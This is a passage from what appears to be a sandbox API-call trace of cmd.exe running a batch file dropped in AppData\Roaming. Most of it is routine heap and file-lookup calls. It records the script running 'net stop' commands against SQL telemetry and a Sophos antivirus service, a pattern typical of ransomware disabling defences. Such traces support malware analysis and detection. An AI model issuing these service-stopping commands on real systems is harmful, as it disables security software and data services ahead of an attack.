Flags=0x8, Size=0x120) returned 0x3f4a80 [0198.709] GetProcessHeap () returned 0x3e0000 [0198.709] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0198.709] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0198.710] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0198.710] GetLastError () returned 0x2 [0198.710] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0198.710] GetLastError () returned 0x2 [0198.711] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0198.711] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0198.711] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0198.711] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0198.712] GetLastError () returned 0x2 [0198.712] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0198.712] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0198.712] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0198.713] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0198.713] SetErrorMode (uMode=0x0) returned 0x1 [0198.713] GetProcessHeap () returned 0x3e0000 [0198.713] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0198.713] GetProcessHeap () returned 0x3e0000 [0198.713] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0198.714] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0198.714] GetProcessHeap () returned 0x3e0000 [0198.714] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0198.714] GetProcessHeap () returned 0x3e0000 [0198.714] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0198.714] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0198.714] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0198.715] GetLastError () returned 0x2 [0198.715] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0198.715] GetLastError () returned 0x2 [0198.716] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0198.716] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0198.716] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0198.717] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0198.717] GetLastError () returned 0x2 [0198.717] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0198.717] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0198.718] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0198.718] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0198.718] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0198.718] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0198.718] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0198.718] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLTELEMETRY /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLTELEMETRY /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SQLTELEMETRY /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xad4, dwThreadId=0x5e8)) returned 1 [0198.722] CloseHandle (hObject=0x78) returned 1 [0198.722] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0198.722] GetProcessHeap () returned 0x3e0000 [0198.722] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0198.722] GetEnvironmentStringsW () returned 0x3f8408* [0198.722] GetProcessHeap () returned 0x3e0000 [0198.722] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0198.723] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0198.723] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0198.859] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0198.859] CloseHandle (hObject=0x74) returned 1 [0198.859] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0198.859] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0198.859] GetProcessHeap () returned 0x3e0000 [0198.859] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0198.859] GetEnvironmentStringsW () returned 0x3f8408* [0198.859] GetProcessHeap () returned 0x3e0000 [0198.859] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0198.859] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0198.859] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0198.859] GetProcessHeap () returned 0x3e0000 [0198.859] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0198.859] GetEnvironmentStringsW () returned 0x3f8408* [0198.859] GetProcessHeap () returned 0x3e0000 [0198.859] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0198.859] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0198.859] GetProcessHeap () returned 0x3e0000 [0198.860] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0198.860] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0198.860] _get_osfhandle (_FileHandle=1) returned 0x264 [0198.860] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0198.860] _get_osfhandle (_FileHandle=1) returned 0x264 [0198.860] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0198.860] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0198.860] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0198.860] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0198.860] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0198.860] SetConsoleInputExeNameW () returned 0x1 [0198.860] GetConsoleOutputCP () returned 0x1b5 [0198.861] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0198.861] SetThreadUILanguage (LangId=0x0) returned 0x409 [0198.861] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0198.861] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0198.861] _get_osfhandle (_FileHandle=3) returned 0x74 [0198.861] SetFilePointer (in: hFile=0x74, lDistanceToMove=2796, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xaec [0198.861] GetProcessHeap () returned 0x3e0000 [0198.861] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0198.861] GetProcessHeap () returned 0x3e0000 [0198.861] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0198.861] GetProcessHeap () returned 0x3e0000 [0198.861] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0198.861] GetProcessHeap () returned 0x3e0000 [0198.861] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0198.861] GetProcessHeap () returned 0x3e0000 [0198.861] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0198.861] GetProcessHeap () returned 0x3e0000 [0198.861] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0198.861] GetProcessHeap () returned 0x3e0000 [0198.861] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0198.861] GetProcessHeap () returned 0x3e0000 [0198.861] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0198.861] GetProcessHeap () returned 0x3e0000 [0198.861] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0198.861] GetProcessHeap () returned 0x3e0000 [0198.861] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0198.862] GetProcessHeap () returned 0x3e0000 [0198.862] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0198.862] GetProcessHeap () returned 0x3e0000 [0198.862] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0198.862] GetProcessHeap () returned 0x3e0000 [0198.862] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0198.862] _get_osfhandle (_FileHandle=3) returned 0x74 [0198.862] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xaec [0198.862] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xdd5, lpOverlapped=0x0) returned 1 [0198.862] SetFilePointer (in: hFile=0x74, lDistanceToMove=2836, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb14 [0198.862] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=40, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ΓÇ£Sophos Clean ServiceΓÇ¥ /y\r\n\n\r\n\r\nÇ¥ /y\r\nlures\r\nnded\r\n") returned 40 [0198.863] _get_osfhandle (_FileHandle=3) returned 0x74 [0198.863] GetFileType (hFile=0x74) returned 0x1 [0198.863] _get_osfhandle (_FileHandle=3) returned 0x74 [0198.863] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb14 [0198.863] GetProcessHeap () returned 0x3e0000 [0198.863] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0198.863] GetProcessHeap () returned 0x3e0000 [0198.863] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0198.866] _tell (_FileHandle=3) returned 2836 [0198.866] _close (_FileHandle=3) returned 0 [0198.866] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0198.866] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0198.866] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0198.866] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0198.866] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0198.867] _wcsicmp (_String1="net", _String2="CD") returned 11 [0198.867] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0198.867] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0198.867] _wcsicmp (_String1="net", _String2="REN") returned -4 [0198.867] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0198.867] _wcsicmp (_String1="net", _String2="SET") returned -5 [0198.867] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0198.867] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0198.867] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0198.867] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0198.867] _wcsicmp (_String1="net", _String2="MD") returned 1 [0198.867] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0198.867] _wcsicmp (_String1="net", _String2="RD") returned -4 [0198.867] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0198.867] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0198.867] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0198.867] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0198.867] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0198.867] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0198.867] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0198.867] _wcsicmp (_String1="net", _String2="VER") returned -8 [0198.867] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0198.867] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0198.867] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0198.867] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0198.867] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0198.867] _wcsicmp (_String1="net", _String2="START") returned -5 [0198.867] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0198.867] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0198.867] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0198.867] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0198.867] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0198.867] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0198.867] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0198.867] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0198.867] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0198.867] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0198.868] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0198.868] SetErrorMode (uMode=0x0) returned 0x1 [0198.868] GetProcessHeap () returned 0x3e0000 [0198.868] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0198.868] GetProcessHeap () returned 0x3e0000 [0198.868] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0198.869] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0198.869] GetProcessHeap () returned 0x3e0000 [0198.869] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0198.869] GetProcessHeap () returned 0x3e0000 [0198.869] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0198.869] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0198.870] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0198.870] GetLastError () returned 0x2 [0198.870] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0198.870] GetLastError () returned 0x2 [0198.870] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0198.871] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0198.871] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0198.965] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0198.970] GetLastError () returned 0x2 [0198.975] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0198.979] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0198.983] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0198.990] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0198.993] SetErrorMode (uMode=0x0) returned 0x1 [0198.995] GetProcessHeap () returned 0x3e0000 [0198.995] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0198.997] GetProcessHeap () returned 0x3e0000 [0198.998] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0198.999] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0199.000] GetProcessHeap () returned 0x3e0000 [0199.002] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0199.002] GetProcessHeap () returned 0x3e0000 [0199.003] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0199.005] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0199.010] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0199.014] GetLastError () returned 0x2 [0199.015] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0199.019] GetLastError () returned 0x2 [0199.022] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0199.025] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0199.028] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0199.029] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0199.029] GetLastError () returned 0x2 [0199.029] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0199.029] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0199.030] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0199.030] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0199.030] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0199.030] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0199.030] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0199.030] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ΓÇ£Sophos Clean ServiceΓÇ¥ /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ΓÇ£Sophos Clean ServiceΓÇ¥ /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ΓÇ£Sophos Clean ServiceΓÇ¥ /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x710, dwThreadId=0x3a0)) returned 1 [0199.034] CloseHandle (hObject=0x74) returned 1 [0199.034] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0199.034] GetProcessHeap () returned 0x3e0000 [0199.034] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0199.034] GetEnvironmentStringsW () returned 0x3f8408* [0199.034] GetProcessHeap () returned 0x3e0000 [0199.034] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0199.034] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0199.035] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0199.179] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x1) returned 1 [0199.179] CloseHandle (hObject=0x78) returned 1 [0199.179] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000001") returned 8 [0199.179] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0199.179] GetProcessHeap () returned 0x3e0000 [0199.179] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0199.179] GetEnvironmentStringsW () returned 0x3f8408* [0199.179] GetProcessHeap () returned 0x3e0000 [0199.179] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0199.179] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0199.179] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0199.179] GetProcessHeap () returned 0x3e0000 [0199.179] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0199.179] GetEnvironmentStringsW () returned 0x3f8408* [0199.179] GetProcessHeap () returned 0x3e0000 [0199.179] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0199.179] FreeEnvironmentStringsW 